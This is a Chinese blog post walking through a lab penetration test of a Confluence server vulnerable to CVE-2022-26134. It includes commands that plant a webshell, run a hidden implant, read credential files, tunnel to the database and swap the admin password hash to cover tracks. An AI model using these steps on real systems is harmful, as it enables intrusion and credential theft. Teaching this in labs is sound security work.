一次不出网的渗透测试

admin 2025年4月24日21:10:23评论0 views字数 1240阅读4分8秒阅读模式

提要

本次模拟不出网环境下的渗透测试,靶机搭建了有CVE-2022-26134漏洞的confluence服务

confluence服务位于端口8090

用到的工具有vshell,suo5,哥斯拉,proxifier,navicat

靶机ip:10.10.10.135

攻击机:10.10.10.1

正式操作

首先我们上传带有CVE-2022-26134的内存马

E:webtoolsONE-FOX集成工具箱_V8.2公开版_by狐狸Java_pathJava_8_winbinjava.exe -jar CVE-2022-26134.jar http://10.10.10.135:8090/ pass key

哥斯拉连接成功后,利用suo5插件注入Suo5Filter马

一次不出网的渗透测试

注入成功后,我们就用suo5客户端连接

一次不出网的渗透测试

至此,我们的一层代理就搭好了

现在我们使用vshell生成正向监听器

一次不出网的渗透测试

下载成功后,我们利用哥斯拉上传文件到/var/tmp

然后在哥斯拉里的虚拟终端上赋权+nohup运行(nohup执行不留痕迹)

cd /var/tmpchmod +x tcp_linux_amd64nohup ./tcp_linux_amd64 > /dev/null 2>&1 &
一次不出网的渗透测试

然后查看内网ip

cat /etc/hosts#172.18.0.3
一次不出网的渗透测试

然后我们就可以在vshell上建立正向连接了

一次不出网的渗透测试

成功连接

一次不出网的渗透测试

我们拥有了正向shell之后,我们可以在/var/atlassian/application-data/confluence/confluence.cfg.xml里看到数据库ip、账号、密码

一次不出网的渗透测试

账号密码postgres:postgres,但是数据库的ip被db顶替了,端口为5432,我们用curl查看

curl db -vv
一次不出网的渗透测试

可以看到数据库IP为172.18.0.2

然后我们现在可以搭建第二个代理来把数据库引出来

首先在vshell里创建隧道

一次不出网的渗透测试

然后我们启动proxifier设置一下

一次不出网的渗透测试
一次不出网的渗透测试

然后使用navicat连接

一次不出网的渗透测试

我们可以在confluence库里的cwd_user表里查看到管理员账号密码

一次不出网的渗透测试

由于confluence数据库密码使用的是 PBKDF2加密,我们先将此密码备份下来

{PKCS5S2}X1AmkpM26Jj50k/2GNBEHB2DfbvKTmoevf90yaWYgALYVarRZK1Bmv2XcdxjDvPR

然后我们将其替换成密码123456

{PKCS5S2}UokaJs5wj02LBUJABpGmkxvCX0q+IbTdaUfxy1M9tVOeI38j95MRrVxWjNCu6gsm

然后快速登录confluence

一次不出网的渗透测试

成功登陆后,我们快速创建新的管理员账号

一次不出网的渗透测试

然后退出admin账号,并将其密码修改成原来的密码

至此,渗透后利用就可以由此展开了。。。

总结

模拟靶机不出网的情况下,首先我们使用suo5代理出shell到vshell,然后再利用proxifier代理出数据库到本地navicat,再在此基础上进行操作

原文始发于微信公众号(富贵安全):一次不出网的渗透测试

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2025年4月24日21:10:23
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   一次不出网的渗透测试https://cn-sec.com/archives/3993399.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息